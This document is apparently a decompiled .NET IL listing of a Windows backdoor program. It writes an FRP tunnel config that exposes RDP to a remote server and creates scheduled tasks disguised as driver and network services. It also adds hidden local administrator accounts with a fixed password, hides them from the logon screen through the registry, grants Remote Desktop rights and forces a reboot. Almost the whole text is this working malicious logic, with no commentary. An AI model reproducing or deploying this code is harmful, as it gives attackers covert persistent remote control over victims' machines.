System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0591: leave.s IL_05A9 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr serverAddr = " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.2 <null> stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " serverPort = 7000 loginFailExit = false auth = { method = "token", token = "ADAD" } user = " stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " [[proxies]] name = "rdp" type = "tcp" localIP = "127.0.0.1" localPort = 3389 remotePort = 0 stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_31 ldloc.s V_30 ldloc.s V_31 callvirt System.String System.String::Trim() call System.Void System.IO.File::WriteAllText(System.String,System.String) ldstr FRP config created ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_32 ldstr Error setting up FRP: {0} ldloc.s V_32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_062F: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Admin detected, creating service... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_33 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_33 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave IL_06AF: nop stloc.s V_34 ldstr Error setting up autorun and task: {0} ldloc.s V_34 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_06AF: nop ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_06AF: nop ldstr System detected, ensuring tasks exist... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_35 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_35 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave.s IL_06AF: nop stloc.s V_36 ldstr Error ensuring tasks exist: {0} ldloc.s V_36 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_06AF: nop nop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.s V_37 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_06D0: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_37 call System.String System.Environment::get_UserName() callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) br IL_075B: ldc.i4.0 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un IL_075B: ldc.i4.0 ldstr S-1-5-32-555 call System.Collections.Generic.List`1<System.String> StandaloneProgram.Program::GetLocalGroupMembers(System.String) callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_41 br.s IL_0742: ldloca.s V_41 ldloca.s V_41 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_42 ldloc.s V_42 stloc.s V_43 ldloc.s V_42 ldc.i4.s 92 callvirt System.Int32 System.String::LastIndexOf(System.Char) stloc.s V_44 ldloc.s V_44 ldc.i4.0 <null> blt.s IL_0725: ldloc.s V_43 ldloc.s V_44 ldc.i4.1 <null> add <null> ldloc.s V_42 callvirt System.Int32 System.String::get_Length() bge.s IL_0725: ldloc.s V_43 ldloc.s V_42 ldloc.s V_44 ldc.i4.1 <null> add <null> callvirt System.String System.String::Substring(System.Int32) stloc.s V_43 ldloc.s V_43 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0742: ldloca.s V_41 ldloc.s V_37 ldloc.s V_43 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Contains(System.String) brtrue.s IL_0742: ldloca.s V_41 ldloc.s V_37 ldloc.s V_43 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloca.s V_41 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_06EE: ldloca.s V_41 leave.s IL_075B: ldc.i4.0 ldloca.s V_41 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_38 ldstr SysMaintenance stloc.s V_39 ldloc.s V_37 callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_41 br IL_09D5: ldloca.s V_41 ldloca.s V_41 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_45 ldstr Attempting to configure user: ldloc.s V_45 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net ldstr user " ldloc.s V_45 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_46 ldloc.s V_46 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() ldloc.s V_46 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_39 callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_0806: leave.s IL_0814 ldstr Skipping user ldloc.s V_45 ldstr due to description containing ldloc.s V_39 call System.String System.String::Concat(System.String,System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_09D5: ldloca.s V_41 leave.s IL_0814: ldstr "net" ldloc.s V_46 brfalse.s IL_0813: endfinally ldloc.s V_46 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr net ldstr user " ldloc.s V_45 ldstr " "" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_47 ldloc.s V_47 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_48 ldloc.s V_47 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_49 ldloc.s V_47 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr net user output: ldloc.s V_48 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net user error: ldloc.s V_49 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_47 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4 8646 bne.un.s IL_08C0: ldloc.s V_47 ldstr Microsoft account detected, creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> stloc.s V_38 leave IL_09E1: leave.s IL_09F1 ldloc.s V_47 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brfalse.s IL_08CE: leave.s IL_08DC leave IL_09D5: ldloca.s V_41 leave.s IL_08DC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_47 brfalse.s IL_08DB: endfinally ldloc.s V_47 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_093D: ldstr "gpupdate" ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_45 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_50 ldloc.s V_50 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_093D: ldstr "gpupdate" ldloc.s V_50 brfalse.s IL_093C: endfinally ldloc.s V_50 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_51 ldloc.s V_51 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr gpupdate exit code: {0} ldloc.s V_51 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09A6: ldc.i4.1 ldloc.s V_51 brfalse.s IL_09A5: endfinally ldloc.s V_51 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_38 ldstr Configured user: ldloc.s V_45 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09E1: leave.s IL_09F1 stloc.s V_52 ldstr Error configuring candidate {0}: {1} ldloc.s V_45 ldloc.s V_52 call System.String System.String::Format(System.String,System.Object,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09D5: ldloca.s V_41 ldloca.s V_41 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue IL_0773: ldloca.s V_41 leave.s IL_09F1: ldc.i4.0 ldloca.s V_41 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_40 ldstr if (Get-LocalUser | Where-Object { $_.Description -eq ' ldloc.s V_39 ldstr ' }) { exit 1 } else { exit 0 } call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_53 ldstr powershell ldstr -Command " ldloc.s V_53 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_54 ldloc.s V_54 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_54 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4.1 <null> bne.un.s IL_0A56: leave.s IL_0A64 ldc.i4.1 <null> stloc.s V_40 ldstr A user with the 'SysMaintenance' description already exists. Skipping creation. ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0A64: leave.s IL_0A7C ldloc.s V_54 brfalse.s IL_0A63: endfinally ldloc.s V_54 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0A7C: ldloc.s V_38 stloc.s V_55 ldstr Error checking for existing maintenance user: {0} ldloc.s V_55 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0A7C: ldloc.s V_38 ldloc.s V_38 brtrue IL_0CDB: leave.s IL_0CF3 ldloc.s V_40 brtrue IL_0CDB: leave.s IL_0CF3 ldstr Creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.3 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr Administrator stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr Admin stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr Windows stelem.ref <null> stloc.s V_56 ldc.i4.0 <null> stloc.s V_57 br IL_0CC1: ldloc.s V_57 ldloc.s V_56 ldloc.s V_57 ldelem.ref <null> stloc.s V_58 ldstr net ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr user " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_58 stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " "ADAD" /add /comment:" stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_39 stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_59 ldloc.s V_59 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_59 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_59 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldloc.s V_59 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brtrue IL_0C96: ldstr "Failed to create user " ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-544') -Member ' ldloc.s V_58 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_60 ldloc.s V_60 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0BAA: ldstr "powershell" ldloc.s V_60 brfalse.s IL_0BA9: endfinally ldloc.s V_60 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_58 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_61 ldloc.s V_61 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0C03: ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldloc.s V_61 brfalse.s IL_0C02: endfinally ldloc.s V_61 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) stloc.s V_62 ldloc.s V_62 ldloc.s V_58 ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) leave.s IL_0C32: ldstr "gpupdate" ldloc.s V_62 brfalse.s IL_0C31: endfinally ldloc.s V_62 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_63 ldloc.s V_63 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0C7F: ldc.i4.1 ldloc.s V_63 brfalse.s IL_0C7E: endfinally ldloc.s V_63 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_38 ldstr Created and configured new user: ldloc.s V_58 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CCC: ldloc.s V_38 ldstr Failed to create user ldloc.s V_58 ldstr , trying next call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CBB: ldloc.s V_57 ldloc.s V_59 brfalse.s IL_0CBA: endfinally ldloc.s V_59 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_57 ldc.i4.1 <null> add <null> stloc.s V_57 ldloc.s V_57 ldloc.s V_56 ldlen <null> conv.i4 <null> blt IL_0ABD: ldloc.s V_56 ldloc.s V_38 brtrue.s IL_0CDB: leave.s IL_0CF3 ldstr Failed to create any new user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CF3: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_64 ldstr Error configuring user(s): {0} ldloc.s V_64 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CF3: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un IL_0D8A: leave.s IL_0D96 ldstr Initiating reboot in 2 minutes for admin ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr shutdown ldstr /r /t 120 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_65 ldloc.s V_65 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr Reboot command exit code: {0} ldloc.s V_65 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0D72: leave.s IL_0D96 ldloc.s V_65 brfalse.s IL_0D71: endfinally ldloc.s V_65 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0D96: ret stloc.s V_66 ldstr Error initiating reboot: {0} ldloc.s V_66 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0D96: ret leave.s IL_0D96: ret ldloc.0 <null> brfalse.s IL_0D95: endfinally ldloc.0 <null> callvirt System.Void System.Threading.Mutex::ReleaseMutex() endfinally <null> ret <null> |